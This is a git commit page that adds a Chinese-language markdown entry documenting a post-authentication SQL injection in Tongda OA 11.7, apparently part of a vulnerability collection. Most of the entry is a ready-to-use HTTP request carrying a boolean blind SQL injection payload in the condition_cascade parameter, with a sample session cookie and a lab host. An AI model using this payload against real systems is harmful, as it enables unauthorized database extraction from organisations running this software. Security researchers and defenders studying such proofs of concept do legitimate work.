add 通达OA 11.7 后台sql注入漏洞
This commit is contained in:
helloexp
parent
971ff2b222
commit
f5f2e12615
22
01-通达OA/通达OA 11.7 后台sql注入漏洞/通达OA 11.7 后台sql注入漏洞.md
Normal file
22
01-通达OA/通达OA 11.7 后台sql注入漏洞/通达OA 11.7 后台sql注入漏洞.md
Normal file
@ -0,0 +1,22 @@
|
||||
# 通达OA 11.7 后台sql注入漏洞
|
||||
|
||||
### 漏洞影响版本
|
||||
11.7
|
||||
|
||||
### 利用前提
|
||||
需要登录后才可以
|
||||
|
||||
### POC
|
||||
其中 `condition_cascade` 参数存在Boolean 盲注
|
||||
```http request
|
||||
GET /general/hr/manage/query/delete_cascade.php?condition_cascade=select if((substr(user(),1,1)='r'),1,power(8888,88)) HTTP/1.1
|
||||
Host: 192.168.77.137
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20200101 Firefox/82.0
|
||||
Accept: */*
|
||||
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Referer: http://192.168.77.137/general/index.php?isIE=0&modify_pwd=0
|
||||
Cookie: PHPSESSID=vA8ZHgClYnJzI3sGocm1LBbW27; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c71fa06d
|
||||
DNT: 1
|
||||
Connection: close
|
||||
```
|
||||
Loading…
x
Reference in New Issue
Block a user